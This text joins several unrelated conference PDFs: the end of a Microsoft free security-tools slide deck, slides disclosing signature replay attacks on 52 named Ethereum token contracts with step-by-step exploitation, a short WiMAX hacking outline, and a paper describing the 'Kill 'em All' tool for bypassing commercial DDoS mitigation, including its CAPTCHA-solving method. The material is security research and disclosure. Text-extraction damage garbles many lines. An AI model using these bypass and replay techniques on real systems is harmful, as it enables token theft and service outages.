3. TOOL: ATTACK SURFACE ANALYZER
• Version: 1.0
• Identifies changes to a Windows system
when installing an application
• Ideally run on a system equal to
production
• Download:
https://www.microsoft.com/en-
us/download/details.aspx?id=24487
3. TOOL: ATTACK SURFACE ANALYZER
SCANS FOR
Registry
File Systems
Registered Filetypes
Ports
Process
Etc.
3. TOOL: ATTACK SURFACE ANALYZER
3. TOOL: ATTACK SURFACE ANALYZER
3. TOOL: ATTACK SURFACE ANALYZER
3. TOOL: ATTACK SURFACE ANALYZER
3. TOOL: ATTACK SURFACE ANALYZER
3. TOOL: PORTQRY
• Version: 2.0
• Port scanner
• GUI and command line
• Download:
https://www.microsoft.com/en-
us/download/details.aspx?id=24009
3. TOOL: PORTQRY
3. TOOL: PORTQRY
3. TOOL: PORTQRY
3. TOOL: EMET
• Version: 5.5
• Enhanced Mitigation Experience Toolkit
(EMET)
• Toolkit for deploying and configuring
security mitigation technologies
• Download:
https://www.microsoft.com/en-
us/download/details.aspx?id=46366
3. TOOL: EMET
3. TOOL: EMET
3. TOOL: EMET
3. TOOL: MESSAGE ANALYZER
• Version: 1.4
• Enables
to
capture,
display,
and
analyze protocol messaging traffic; and
to trace and assess system events and
other
messages
from
Windows
components
• Download:
https://www.microsoft.com/en-
us/download/details.aspx?id=44226
3. TOOL: MESSAGE ANALYZER
4. SECURITY ARSENAL
• A vast arsenal of free security tools
released by Microsoft (Thanks):
1. Development
2. TI
• There is even more tools available!
4. NO EXCUSES
4. ONLY TECHNOLOGY IS NOT ENOUGH
4. FREE TRAINING
• Microsoft SDL Process Training
https://www.microsoft.com/en-
us/sdl/process/training.aspx
• SAFECode Training
https://training.safecode.org/
5. Q&A
• Thanks!
• Beer appreciated!!!
• @simonroses
• @vulnexsl
• www.vulnex.com
• www.simonroses.com | pdf |
!!!!Replay!Attacks!on!Ethereum!Smart!Contracts
Zhenxuan!Bai,!Yuwei!Zheng,!!Kunzhe!ChaiSenhua!Wang
About!us
•
360!Technology!is!a!leading!Internet!security!company!in!China.!Our!core!
products!are!anti-virus!security!software!for!PC!and!cellphones.!
•
UnicornTeam!(https://unicorn.360.com/)!was!built!in!2014.!This!is!a!group!
that!focuses!on!the!security!issues!in!many!kinds!of!wireless!
telecommunication!systems.!The!team!also!encourage!members!to!do!other!
research!that!they!are!interested!in.!
•
Highlighted!works!of!UnicornTeam!include:!
–
Low-cost!GPS!spoofing!research!(DEFCON!23)!
–
LTE!redirection!attack!(DEFCON!24)!
–
Attack!on!power!line!communication!(Black!Hat!USA!2016)
PPTwww.1ppt.com/moban/!!!!!!!!!!!!!!!!!!PPTwww.1ppt.com/sucai/!
PPTwww.1ppt.com/beijing/!!!!!!!!!!!!!!!!!!!PPTwww.1ppt.com/tubiao/!!!!!!!
PPTwww.1ppt.com/xiazai/!!!!!!!!!!!!!!!!!!!!!PPTwww.1ppt.com/powerpoint/!!!!!!!
www.1ppt.com/ziliao/!!!!!!!!!!!!!!!!!!!www.1ppt.com/fanwen/!!!!!!!!!!!!!!
www.1ppt.com/shiti/!!!!!!!!!!!!!!!!!!!!!www.1ppt.com/jiaoan/!!!!!!!!!!!!!!!!
PPTwww.1ppt.cn!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!PPTwww.1ppt.com/kejian/!!
www.1ppt.com/kejian/yuwen/!!!!www.1ppt.com/kejian/shuxue/!!
www.1ppt.com/kejian/yingyu/!!!!www.1ppt.com/kejian/meishu/!!
www.1ppt.com/kejian/kexue/!!!!!www.1ppt.com/kejian/wuli/!!
www.1ppt.com/kejian/huaxue/!!www.1ppt.com/kejian/shengwu/!!
www.1ppt.com/kejian/dili/!!!!!!!!!!www.1ppt.com/kejian/lishi/!!!!!!!!!
Part!1
Part!2
Part!3
Part!4
The!Main!Idea
Back!Ground!
Demonstration
Safety!Problem
Replay!Attack
Part!1
Back Ground
(Blockchain & smart contract & Ethereum)
What is Blockchain?
Blockchain is:
A!Large-scale!globally!decentralized!computer!
network!!
A!system!that!users!can!interact!with!by!sending!
transactions!
—!Transactions!are!guaranteed!by!
Consensus!Mechanism!
Advantages of Blockchain
• having!the!unified!database!with!rapid!consensus!
• With!large-scale!fault-tolerant!mechanism!
•
Not!relying!on!trust,!not!controlled!by!any!single!administrator!or!
organization!(not!for!private/consortium!blockchain)!
• Audit-able:!external!observers!can!verify!transaction!history.!
• Automation:!operating!without!human!involvement.!
What on-earth can Blockchain do?
Cryptocurrency: digital assets on the Blockchain
There!are!tokens!in!the!public!blockchains!used!to!limit!the!rates!of!updating!
transactions!&!power!the!maintenance!of!Blockchain.!!
Record!Registration!(such!as!the!Domain!Name!System!based!on!Blockchain.!
Timestamp!to!track!high!value!data!
Financial!Contracts!!
General!Computation!
Non-monetary Characteristics
Support Functionalities
Ethereum
About 2013, the public realized that Blockchain can be used in hundreds
of applications besides cryptocurrency, such as asset issuance,
crowdfunding, domain-name registration, ownership registration, market
forecasting, Internet of things, voting and so on.
How to realize?
Smart contracts are pieces of code that live on the Blockchain
and execute commands exactly how the were told to.
“smart contract" - a computer program running in a secure environment
that automatically transfers digital assets according to previously arbitrary
rules.
business people
Developer
Smart Contract
How to build one?
■ Blockchain with built-in programming language
■ maximum abstraction and versatility
■ it is very ideal to process smart contracts
Ethereum
Ethereum
EVM: It is the operating environment for smart contract in
the Ethereum. It is not only encapsulated by a sandbox, but
in fact it is completely isolated, that is, the code that runs
inside the EVM does not have access to the network, file
system, or other processes. Even smart contracts have
limited contact with other smart contracts.
Operating System
Contract usage scenario
Hedging contracts, Savings Purse,
Testamentary contract
Financial scenario
Online voting, De-centralized
governance , Domain name
registration
Non-financial scenario
Part!2!
Related Safety Problem
The Ecology of the Ethereum
On average, there are 100 thousand of new users join the
Ethereum ecosystem every day. The users are very
active, with an average daily transactions of more than 1
million times on Ethereum.
The safety issue of the Ethereum
attack!and!token!steal!!
exchange
probable!to!be!hijacked!
wallet
overflow!!attack!
smart contract
main
parts
The security problem of smart contract
April!2018,!
!!BEC!contract!
May!2018,!
!EDU!contract!
June!2018,!
!SNC!contract!
Directly!affects!the!major!
exchanges,!including!the!
issue,!recharge!or!cash!
withdrawal!of!the!tokens.!
Vulnerability in Smart Contracts
According to < Finding The Greedy , Prodigal , and Suicidal Contracts at Scale>, In
March 2018, nearly 1 million smart contracts were analyzed , among which there are
34200 smart contracts can be easily attacked by hackers.
How to lower the probability of loss ?
A complete and objective audit is required for smart contracts.
The emergency response can be made when the vulnerability was found in Smart
Contracts
Reward can be provided when someone detect any bug .
Replay attack on
smart contract
Part!3!
What are we care about - Replay attack
Replay!attack:!If!a!transaction!is!legitimate!on!one!Blockchain,!it!is!also!
legitimate!on!another!block!chain.!
When!you!transfer!BTC1,!your!BTC2/BTC3!may!be!transferred!at!the!same!time.!
Our discovery
Many!smart!contracts!adopt!the!same!way!to!verify!the!validity!of!
the!signature,!and!it!is!possible!for!replay!attack.!
Our motivation
We!proposed!the!replay!attacks!in!the!smart!contracts,!which!hope!to!
attract!the!user’s!attention.!
We!detect!the!vulnerability!in!smart!contracts,!which!hope!to!make!
them!more!secure.!
We!hope!to!enhance!the!risk!awareness!for!contract!creator!and!
ensure!the!interests!of!investors.!
we!found!the!replay!attack!problem!exists!in!52!smart!contracts.!!
We! analyzed! the! smart! contract! example! to! verify! the! replay!
attack.!
We!analyzed!the!source!and!process!of!replay!attack!to!expound!
the!feasibility!of!replay!attack!in!principle.!!!
We!verified!the!replay!attack!based!on!the!signature!
vulnerability.!!
We!proposed!defense!strategy!to!prevent!this!problem.!!
Our Contribution
• Judging whether the contract is accord with the
ERC20 standard.
we set three scanning standards to discovery the
smart contracts which have the VULNERABILITY.
!!!!!require!(!totalsupply>0)!
Vulnerability Scanning
• Get! the! name! of! the! contract! to! determine!
whether!the!name!is!valid.!
Vulnerability Scanning
•
Filter!smart!contracts!vulnerable!to!replay!attack.!!
Scanning!Result:!52!risky!targets!!
Vulnerability Scanning
● It! has! been! confirmed(proved)! that! there! are! two! smart!
contracts!allow!proxy!transactions..!
● If!the!two!smart!contracts!use!a!similar!mechanism!and!share!
the!same!transaction!format.!!
● When!a!transaction!happens!in!one!contract,!this!transaction!
will! be! also! legal! in! another! contract,! and! the! replay! attack!
will!be!successfully!executed.!
Why does the replay attack occur?
The issue lies in this line: bytes32 h = keccak256(_from,_to,_value,_fee,nonce);
Example
Attack Process
● we!chose!two!ERC20!smart!contracts,!the!UGT!contract!
and!the!MTC!contract.!
● we!created!two!accounts,!Alice!and!Bob!
● we! deposit! some! tokens! in! the! two! accounts! in! UGT!
contracts!and!MTC!contracts.!
● at!least!one!Ethereum!full!node!
Experiment condition
Step! one:! transaction! records! on! the! Ethereum! were!
scanned!to!find!out!accounts!which!had!both!UGT!tokens!
and!MTC!tokens(we!use!two!accounts,!Alice!and!Bob)!.!!
Verification of the replay attack process
Step!two:!Bob!induced!Alice!to!send!him!2!UGT!tokens.!The!transaction!input!data!
is!shown!as!below:!
Function:! transferProxy(address! _from,! address! _to,! uint256! _value,! uint256!
_feeUgt,!uint8!_v,!bytes32!_r,!bytes32!_s)!
MethodID:!0xeb502d45!
Verification of the replay attack process
Step! three:! Bob! take! out! the! input! data! of! this! transaction! on! the!
blockchain.!The!parameters!“from,!to,!value,!fee,!v,!r,!s”!were!extracted!
from! [0]-! [6]! in! step! two.! The! following! is! the! implementation! of! the!
transfer!function.!
Verification of the replay attack process
Step!four:!Bob!use!the!input!data!in!step!2!to!execute!another!transfer!in!
the! smart! contract! of! MTC.! The! result! of! this! transaction! is! shown! as!
below.!
Verification of the replay attack process
Step!five:!Bob!got!not!only!2!UGT!tokens!but!also!2!MTC!tokens!from!
Alice.!In!this!process,!the!transfer!of!2!MTC!tokens!was!not!authorized!
by!Alice.!
Verification of the replay attack process
Part!4
Demonstration
Select contract
Account setting
genesis.json
the UGT contract and the MTC contract
!
•
Alice!and!Bob!
•
Alice(the!sender):!0x8e65d5349ab0833cd76d336d380144294417249e!
•
Bob(the!receiver):!0x5967613d024a1ed052c8f9687dc74897dc7968d6!
•
Both!own!some!tokens!for!transferring.!
UGT!Token!:0x43eE79e379e7b78D871100ed696e803E7893b644
MTC!Token:0xdfdc0D82d96F8fd40ca0CFB4A288955bECEc2088!
Core code
Demo
Demo
By!April!27th,!2018,!loophole!of!this!replay!attack!risk!exists!in!52!
Ethereum!smart!contracts.!
according!to!the!vulnerability!of!the!replay!attack:
l High-risk!group!(10/52):!no!specific!information!is!contained!in!the!signature!of!
smart!contract,!which!the!signature!can!be!fully!reused.!
l moderate-risk!group!(37/52):!fixed!string!is!contained!in!the!signature!of!smart!
contract,!which!the!probability!of!reusing!the!signature!is!still!high.!
l Low! -risk! group! (5/52):! the! address! of! the! contract! (1! in! 5)! or! the! address! of!
sender!(4!in5)!is!contained!in!the!signature!of!smart!contract.!There!are!strong!
restrictions,!but!there!is!still!!own!the!possibility!of!replay!attacks.
Statistics and Analysis
l Replay!in!the!same!contract!(5/52)
MiracleTeleRoyalForkTokenFirstBloodKarmaTokenKarmaToken2
l Cross-contracts!replay!(45/52)
Besides,!we!divided!these!45!contracts!into!3!groups,!for!the!specific!prefix!
data!used!in!the!signatures.!Cross-contracts!replays!may!happen!among!any!
contracts!as!long!as!they!are!in!a!same!group.!
!According!to!feasible!replay!attack!approaches:
Statistics and Analysis
ü Group!1the!specific!prefix!data!1!used!in!the!signatures!(28/52)
ARCCoin,BAF,!Claes!CashClaes!Cash2CNF,CWC,DET,!Developeo,!
Envion,!FiCoin,!!!GoldCubJaroCoinmetax,!metax2!NODE,!NODE2,!NPLAY,!
SIGMA,! solomex,! Solomon! Exchange,! Solomon! Exchange2,! Trump! Full! Term!
Token,!Trump!Impeachment!Token,!X,!ZEUS!TOKENZEUS!TOKEN2!,cpay.!
ü Group2the! specific! prefix! data! 2! used! in! the! signatures! (7/52)
"\x19Ethereum!Signed!Message:\n32"
AcoreCLCCLOUTCNYToken,!CNYTokenPlus,!GigBitThe!4th!
Pillar!!Token,
Statistics and Analysis
!According!to!feasible!replay!attack!approaches:
ü Group3no!specific!prefix!data!!used!in!the!signatures!(10/52)
BlockchainCutiesFirst(smt),!GG!TokenM2C!Mesh!NetworkM2C!
Mesh! Network2! MJ! comeback,! MJ! comeback2,! MTC! Mesh! Network,!
SmartMesh!Token,!UG!Token
l Replay!between!test!chain!and!main!chain!(2/52)!
MeshBox!!!MeshBox2!
l Replay!between!different!main!chain!(0/52)
!According!to!feasible!replay!attack!approaches:
Statistics and Analysis
!According!to!!the!trading!frequency!of!above-mentioned!
contracts!
!By!9:00!April!30th,!2018,!
• !24!contracts!were!found!which!have!the!transaction!records!within!
one!week,!The!proportion!is!46.15%!of!the!total!number!of!contracts.!!
• 9!contracts!were!found!which!have!the!transaction!records!from!one!
week!to!one!month,!The!proportion!is!17.31%!of!the!total!number!of!
contracts.!
Statistics and Analysis
! According! to! ! the! trading! frequency! of! above-mentioned!
contracts!
!By!9:00!April!30th,!2018,!
• 16!contracts!were!found!which!have!the!transaction!records!beyond!
one!month,!The!proportion!is!30.77%!of!the!total!number!of!contracts.!!
• 3!contracts!Only!have!the!records!for!deployment.!The!proportion!is!
5.77%!of!the!total!number!of!contracts.!!
According! to! the! comprehensive! analysis,! 63.46%! of! the!
contract!transactions!are!still!active.!
Statistics and Analysis
Ø The!designers!of!smart!contract!should!always!confirm!the!
suitable! range! of! digital! signature! when! designing! smart!
contracts.!
Ø The!smart!contracts!deployed!on!public!chain!should!add!in!
the! specific! information! of! the! public! chain! such! as! the!
chainID!and!the!name!of!the!public!chain.!
Ø The!users!of!smart!contracts!need!to!pay!attention!to!news!
and!reports!concerning!the!loophole!disclosures.!
Countermeasures
p The! security! problems! of! smart! contracts! have! been!
widely!concerned.!
!
p As!long!as!the!signature!was!not!limited!by!the!smart!
contracts,!there!is!possibility!of!replay!attack.!
p We! believe! that! loopholes! on! the! Ethereum! smart!
contracts!have!not!totally!come!to!light.
!
Conclusion | pdf |
WiMAX Hacking 2010
pierce goldy aSmig
DEFCON 18
updated slides, code, and discussion at
https://groups.google.com/group/wimax-hacking
The Technology
Service and Deployment
Reseller Access
Echo Peak
Clearspot
Hacking the Home Device
HTC EVO
Captive Portal Bypass
Location Based Services
Google Group
https://groups.google.com/group/wimax-hacking | pdf |
Kill 'em All -- DDoS Protection Total Annihilation!
Tony T.N. Miu1, W.L. Lee2, Alan K.L. Chung2, Daniel X.P. Luo2, Albert K.T. Hui2,
and Judy W.S. Wong2
1Nexusguard Limited
[email protected]
2Network Threats Information Sharing and Analysis Center (NT-ISAC)
Bloodspear Labs
{leng,alan,daniel,albert,judy}@bloodspear.org
Abstract. With the advent of paid DDoS protection in the forms of CleanPipe,
CDN / Cloud or whatnot, the sitting ducks have stood up and donned armors...
or so they think! We're here to rip apart this false sense of security by dissecting
each and every mitigation techniques you can buy today, showing you in
clinical details how exactly they work and how they can be defeated.
Essentially we developed a 3-fold attack methodology:
1.
stay just below red-flag rate threshold,
2.
mask our attack traffics inconspicuous,
3.
emulate the behavior of a real networking stack with a human operator
behind it in order to spoof the correct response to challenges,
4.
???
5.
PROFIT!
We will explain all the required look-innocent headers, TCP / HTTP challenge-
response handshakes,JS auth bypass, etc. etc. in meticulous details. With that
knowledge you too can be a DDoS ninja! Our PoC attack tool "Kill-em-All"
will then be introduced as a platform to put what you've learned into practice,
empowering you to bypass all DDoS mitigation layers and get straight through
to the backend where havoc could be wrought. Oh and for the skeptics among
you, we'll be showing testing results against specific products and services.
Keywords: DDoS mitigation, DDoS, large-scale network attack
1
Introduction
DDoS attacks remain a major threat to internet security because they are relatively
cheap yet highly effective in taking down otherwise well-protected networks. One
need look no further than the attack on Spamhaus to realize the damage potential –
bandwidth clog peaked at 300Gbps, all from a mere 750Mbps generated attack traffic
[1]!
In the following sections, we first examine DDoS attacks observed in the wild and
commercially available mitigation techniques against those attacks, with brief
discussio
mechanis
concept (
achieve t
DDoS mi
To co
mitigation
defending
2
A
DDoS at
rampant t
DDoS att
race, lea
modern d
system [2
2.1
DD
It is hel
complexi
n on each te
sms that expl
(PoC) tool “K
total bypass, t
itigation solut
onclude, we
n solutions,
g against “Kil
Quick Overv
ttacks are sim
they form a p
tack and defe
ding to old-s
days. Before w
2].
DoS Attack C
lpful to clas
ity, with refere
F
echnique’s in
loit these we
ill ’em All”, s
thereby defea
tions.
substantiate
and propose
l ’em All”-typ
view
mple yet high
part of the eve
ense technolog
school protec
we examine th
Classification
ssify DDoS
ence to Error
Figure 1. DDoS
nherent weakn
eaknesses and
show how byp
ating defense-i
our claim w
a next-gen m
pe attacks.
hly effective.
eryday interne
gies have evo
ctions comple
he technical d
n Quadrant
attacks accor
r! Reference s
S attack classifi
nesses. Next,
d, through illu
pass mechanis
in-depth desig
with testing r
mitigation me
These days
et traffic norm
olved tremend
etely losing
details let’s sta
rding to the
source not fou
fication quadran
, we introduc
ustrating our
sms can be co
gn typically a
esults agains
ethodology c
DDoS attack
m. Over the pa
dously through
their relevan
art with a clas
ir attack vol
und. below.
nt
ce bypass
proof-of-
mbined to
adopted in
st specific
capable of
ks run so
ast decade,
h an arms
nce in the
ssification
lume and
The crudest form of DDoS attack are volumetric DDoS attacks, whereby a huge
volume of traffic pours into the victim in a brute-force manner, hogging all bandwidth
otherwise available for legitimate purposes. Execution is expensive, as the attacker
would have to send traffic whose volume is on par with the victim’s spare capacity.
This translates to a higher monetary cost associated with hiring botnets. The age-old
ping flood is a prime example.
Semantic DDoS attacks work smarter, amplifying firepower by exploiting semantic
contexts such as protocol and application weaknesses [3]. This effectively tips the
balance in the attacker’s favor, making attacks much cheaper. Examples of semantic
attacks include Slowloris [4] and Smurf [5] attacks, as well as application level
attacks that make excessive database lookups in web applications.
A third category, blended DDoS attacks, aims to achieve stealthy attacks through
blending
into
legitimate
traffic,
practically
rendering
ineffective
most
countermeasures designed to filter out abnormal, presumably malicious, traffic. HOIC
[6] is an example of an attack that employs blending techniques via randomized
headers.
Note that these categories are by no means mutually exclusive. For instance,
blended attacks that also exploit application weaknesses are not at all uncommon in
the wild.
2.2
DDoS Mitigation Techniques
Mitigation are techniques used to reduce the impact of attacks on the network. The
upcoming paragraphs [2] shall explain the three main types of mitigation such as
traffic policing, black/white listing and proactive resource release as shown in Figure
2.
Agains
curb attac
and rate
violates p
ensure co
packet dr
Blackl
tedious w
entire IP
volume
Blacklisti
zombied
preapprov
certain am
Anoth
proactive
up. For c
usually d
treating th
based me
resource
sending a
connectio
st volumetric
ck traffic. Com
limiting, wh
predetermined
onformance w
ropping (traffi
listing is esse
work of having
addresses fo
immediately
ing cannot be
computers
ves traffic fro
mount of volu
er approach
e resources rel
compatibility
deployed exter
hem as black
echanisms suc
freeing by me
a TCP RST
on. For TCP-b
Figure 2. D
attacks, a di
mmon implem
hereby traffic
d traffic condi
with capacity
c policing), or
entially a sho
g to classify i
or a certain p
upon ident
e permanent, a
can be repa
om entire IP
ume upon dete
that is most
lease whereby
and scalabili
rnally to indiv
boxes. This p
ch as enlargin
eans of TCP c
packet to a
based DDoS
DDoS mitigation
irect mitigatin
mentations typ
that exceeds
itions (baselin
rules. This is
r outright blac
rt circuit mec
individual flow
period of time
tification of
as IP address
aired. In con
addresses fo
ermining those
effective ag
y resources p
ity reasons, c
vidual compu
recludes hous
ng the TCP co
connection res
server host i
attacks, force
n techniques
ng tactic emp
pically involv
s a capacity t
ne profile) are
s usually achi
cklisting of in
chanism aime
ws by outrigh
e or for a cer
one attack
es can be dyn
ntrast to bla
or a certain p
e sources are w
gainst resourc
rone to starva
commercial m
uter systems an
sekeeping mea
oncurrent conn
set can be ins
s sufficient t
eful TCP con
loys traffic p
ve baseline en
threshold or
e forcibly supp
ieved through
fringing traffi
ed at cutting
ht dropping tra
rtain amount
from those
namically ass
acklisting, w
period of time
well behaving
e starvation
ation are forc
mitigation solu
nd networkin
asures that req
nection pool.
strumented ex
to close and
nnection reset
policing to
forcement
otherwise
pressed to
h selective
ic sources.
down the
affic from
of traffic
sources.
igned and
whitelisting
e or for a
g.
attacks is
cibly freed
utions are
g devices,
quire host-
That said,
ternally—
free up a
is a very
practical
handled w
2.3
DD
Referring
attacks w
measurem
monitorin
corner at
inspection
analysis),
for detect
Indeed
addresses
approach
visibility
Seman
telltale si
not be triv
for this r
catching k
control mech
with proactive
DoS Detectio
g to Figure 3 b
which are de
ment and ba
ng respectivel
ttacks get sm
n, application
, or even prot
tion.
d, rate meterin
s or to addres
h cannot corr
into traffic ch
ntic attacks us
ignature is its
vial to implem
reason that pr
known seman
hanism. Reso
e resources rel
on Technique
below, at the
ead obvious
aselining met
ly; at the oth
maller and cl
n-level exam
ocol statistics
Figure 3. D
ng and baselin
ss ranges suc
relate across
haracteristics d
sually follow
overlapping
ment but neve
rotocol sanity
ntic attacks.
ource holding
lease.
s
top left-hand
in their foot
thods via st
her end of the
everer, for th
mination (via
s and behavior
DDoS detection
ne enforcemen
ch as entire s
unrelated so
deeper than ju
specific patte
IP fragments
rtheless provi
y and behavio
attacks like
corner we ha
tprints, easily
traightforward
e spectrum at
hose, protoco
syslog min
r big-data ana
n techniques
nt can be appli
subnets. But,
ources, becau
ust capacity ru
erns. For insta
. Checking fo
ides definite c
or checking a
Slowloris [2]
ave high volum
y detectable
d SNMP or
the bottom r
ol sanity and
ning / applic
alysis are often
ied to specific
a pure traffic
se that woul
ule violations.
ance, Teardrop
or these signa
criteria for filte
are mostly eff
] are best
me simple
with rate
r Netflow
right-hand
d behavior
cation log
n required
c source IP
c policing
ld require
p Attack’s
atures may
ering. It is
fective for
Modern application-level attacks do their dirty works at upper layers, exhibiting no
abnormal behavior at the lower layers. Detection therefore would have to work on
application-level behaviors, via syslog or application log analysis methods.
Traffic statistics and behavior big data analysis aims at building a baseline profile
of traffic such that significant deviation at runtime can trigger a red flag. Generally
data-mining can work on profiling protocol parameters, traffic behaviors, and client
demographics.
3
Authentication Bypass
In response to mitigation techniques that excel at filtering out malformed traffic,
blended attacks gained popularity. They strive to evade filtering by mimicking
legitimate traffic, such as for HTTP requests to bear believable real-world User-Agent
string, and have variable lengths.
3.1
TCP SYN Authentication
With this method, the authenticity of the client’s TCP stack is validated through
testing for correct response to exceptional conditions, such that spoofed source IPs
and most raw-socket-based DDoS clients can be detected. Common tactics include
sending back a RST packet on the first SYN expecting the client to retry, as well as
deliberately sending back a SYN-ACK with wrong sequence number expecting the
client to send back as RST and then retry.
The best approach to defeating this method is to have the OS networking stack
handle such tests. There are essentially two methods:
Figure 4. TCP reset
TCP Reset —Anti-DDoS gateway will send a reset (RST) flags to forcefully reset the
backend’s established TCP connections (those having successfully completed three-
way handshaking) as shown in Figure 4. It is the most common method for TCP
connection verification, as purpose-built DDoS bots may not have the retry logic
server
client
mitigation
device
SYN
SYN ACK
ACK
RST
SYN
SYN ACK
ACK
coded, unlike a real browser. However, a drawback of this method is that an error
page will show up on the browser, confusing the user to no end, who has to manually
reload the web page.
Figure 5. TCP out-of-sequence
TCP Out-of-sequence — Unlike TCP Reset, the anti-DDoS gateway can deliberately
pose a challenge to the client by sending SYN-ACK replies with an out-of-sequence
sequence number as shown in Figure 5. Since the sequence number is incorrect, the
client is supposed to reset the TCP connection and re-establishes the connection
again. Again a purpose-built bot would likely not be so smart. Compare with TCP
Reset, this method has the added advantage that it would not introduce strange user
experience.
3.2
HTTP Redirect Authentication
The basic idea is that a legitimate browser will honor HTTP 302 redirects. As such,
by inserting artificial redirects, it would be safe to block non-compliant clients.
Figure 6. HTTP redirect authentication
Clearly, it is not particularly difficult to implement just enough support for HTTP
redirects to fool HTTP Redirect Authentication. +The purpose of this authentication is
to distinguish botnet and HTTP compliant applications.
server
client
mitigation
device
SYN
SYN ACK (with wrong seq. no.)
RST
SYN
SYN ACK
ACK
server
client
mitigation
device
GET <server> /index.html
HTTP 302 redir to <mitigation device>
/foo/index.html
GET <mitigation device>
/foo/index.html
HTTP 302 redir to <server> /index.html
GET <server> /index.html
3.3
HTTP Cookie Authentication
For similar purpose, this method as shown in Figure 7 works like, and is usually used
together with, HTTP Redirect Authentication. Essentially, browser’s cookie handling
is tested. Clients that do not carry cookies in subsequent HTTP requests are clearly
suspect and can be safely blocked.
Figure 7. HTTP cookie authentication
Some mitigation devices may allow administrator to configure custom field name
for the HTTP cookie instead of standard one as shown in Figure 8. However, not all
browsers will support this feature and thus it is not widely used.
Figure 8. HTTP cookie authentication with header token
As in adding support for HTTP Redirect Authentication, cookie support does add
additional complexity and reduces raw firepower in DDoS attacks, but is nevertheless
easily to implement.
3.4
JavaScript Authentication
With JavaScript Authentication, a piece of JavaScript code embedded in the HTML is
sent to clients as a challenge as shown in Figure 9. Obviously, only clients equipped
with a full-fledged JavaScript engine can perform the computation. It would not be
economical for DDoS attack tools to hijack or otherwise make use of a real
server
client
mitigation
device
GET <server> /index.html
HTTP 302 redir to <mitigation device>
/foo/index.html (with cookie)
GET <mitigation device>
/foo/index.html (with cookie)
HTTP 302 redir to <server> /index.html
GET <server> /index.html (with cookie)
GET <server> /index.html (with X-header)
server
client
mitigation
device
GET <server> /index.html
HTTP 302 redir to <mitigation device>
/foo/index.html (with X-header)
GET <mitigation device>
/foo/index.html (with X-header)
HTTP 302 redir to <server> /index.html
GET <server> /index.html (with X-header)
heavyweight browser to carry out attacks. The purpose of Javascript authentication is
to identify whether the HTTP request is send from a real browser or not.
Figure 9. Javascript authentication
An extended implementation would make use of UI elements such as JavaScript
dialog boxes or detecting mouse movements in order to solicit human inputs. Going
this far would impede otherwise legitimate automated queries, making this
mechanism only suitable for a subset of web sites designed for human usages, but not
those web APIs such as REST web services.
3.5
CAPTCHA Authentication
A very heavy-handed approach that involves human intervention whereby CAPTCHA
challenges are inserted into suspicious traffic as shown in Figure 10. If the client end
is successful in solving the CAPTCHA, it will be whitelisted for a certain period of
time or for certain amount of subsequent traffic, after which it will need to
authenticate itself again. The purpose of this authentication is to distinguish whether
the request is initiated by a real human or a bot.
Figure 10. CAPTCHA authentication
This method is, in itself, rather intrusive and in practice used only sparingly. While
far from easy, automated means to solve CAPTCHA do exist and is a topic of
ongoing research.
server
client
mitigation
device
GET <server> /index.html
HTTP 200 /js.htm
POST <mitigation device> /auth.php
HTTP 302 redir to <server> /index.html
GET <server> /index.html
server
client
mitigation
device
GET <server> /index.html
HTTP 200 /captcha.htm
POST <mitigation device> /auth.php
HTTP 302 redir to <server> /index.html
GET <server> /index.html
4
Po
Through
bypassing
verificatio
attack tra
All” deve
11.
In prac
work in u
each of th
After
been plac
in the int
over the c
As des
Therefore
every 5 m
authentic
Nevert
attack dis
when the
“Kill ‘
OS netwo
if the ant
redirect
authentic
oC Tool Desig
extensive tes
g all commerc
on (authentic
affics staying j
eloped to dem
F
ctice, an entir
unison to chal
hem below.
successful au
ce on to the w
terest of perfo
cleared netwo
scribed in [2]
e, the authent
minutes. All
ation code.
theless we fou
scovery mech
source is whi
em All” was
orking library
ti-DDoS devi
or some Jav
ity, by relegat
gn and Imple
sting we have
cial mitigation
ation) so as
just below tra
monstrate the e
Figure 11. Proof
re suite of auth
llenge traffic s
uthentication,
whitelist, mean
ormance. This
ork path.
]. IP addresse
tication proce
l attack reque
und that certai
anisms such a
itelisted. Tacti
designed to u
, it can fully s
ce attempt so
vaScript test,
ting the task to
ementation
e developed
n solutions. T
to be cleared
affic threshold
effectiveness
of-of-Concept To
hentications m
sources. We e
oftentimes th
ning a number
affords the a
es would just
ess will repea
ests sent after
in traffic rules
as rate measur
ics against thi
use the OS stac
simulate as a b
ource host ver
our program
o a real web b
a sure-fire m
The key idea i
d of further s
d. A proof-of-
of this approa
Tool "Kill 'em Al
mechanisms c
examine the ap
he source IP
r of expensive
attacker a certa
be whiteliste
at after certain
r re-authentica
s must be obs
rement are us
is is outlined b
ck to handle u
bona fide web
rification, like
m still is cap
browser.
methodology c
is to satisfy so
crutiny, and
f-concept tool
ach, is shown
ll"
covering multi
pproach taken
addresses wo
checks will b
ain period of
d for a period
n time interva
ation will use
erved still, as
ually not disa
below as well.
user requests.
b client. Moreo
e TCP SYN a
pable of “pro
capable of
ource host
then send
“Kill ‘em
n in Figure
iple layers
n to defeat
ould have
be skipped
free reign
d of time.
al, say for
e the new
low-level
abled even
.
Using the
over, even
auth, TCP
oving” its
“Kill ‘em All” will attempt bypass 3 times for each HTTP redirect challenge, this
way TCP Reset and the TCP Out-of-Sequence auth can be properly defeated. Indeed
this is how a real client will handle retries and redirects.
4.1
Cookie Authentication
For HTTP cookie authentication, our tools will spawn a web browser to process the
cookie request. Cookie is attached to all subsequent attack requests we sent.
4.2
JavaScript Authentication
“Kill ‘em All” can fully handle JavsScript thanks to embedded JavaScript engine.
This JavaScript capability makes it look like a real browser, because JavaScript
capability is very uncommon in DDoS bots.
For proper handling of Javascript, we have incorporated the V8 JavaScript engine.
Ideally a full DOM should be implemented but for the purpose of passing
authentication a subset of DOM was sufficient.
Attack tools however, can incorporate standalone JavaScript engines such as
Spidermonkey or V8 which are relatively lightweight and would not bog down
attacks too much. As of this writing, the major challenge with this bypass method lies
with adequate DOM implementation.
4.3
CAPTCHA Authentication
Widely considered the final frontier for source host verification, CAPTCHAs are not
completely unbreakable by automated means. In “Kill ‘em All” we have implemented
CAPTCHA capability whereby CAPTCHA challenges are automatically processed
and answered. Given sufficient baseline training, the success rate can be near prefect.
We couldn’t find a light-weight cross-platform CAPTCHA library, so we’ve
implemented our own. The algorithm first convert the CAPTCHA image to black-
and-white to enhance contrast. Then a 3 by 3 median filter is applied to remove
background noises such as dots and thin lines. Afterwards words are segmented into
individual characters and their boundaries detected. Finally, characters are compared
against trained baseline based on simple pixel differences. Against NSFocus ADS,
success rate of nearly 50% was achieved.
Some CAPTCHA might have rotated or curved characters. This will require a
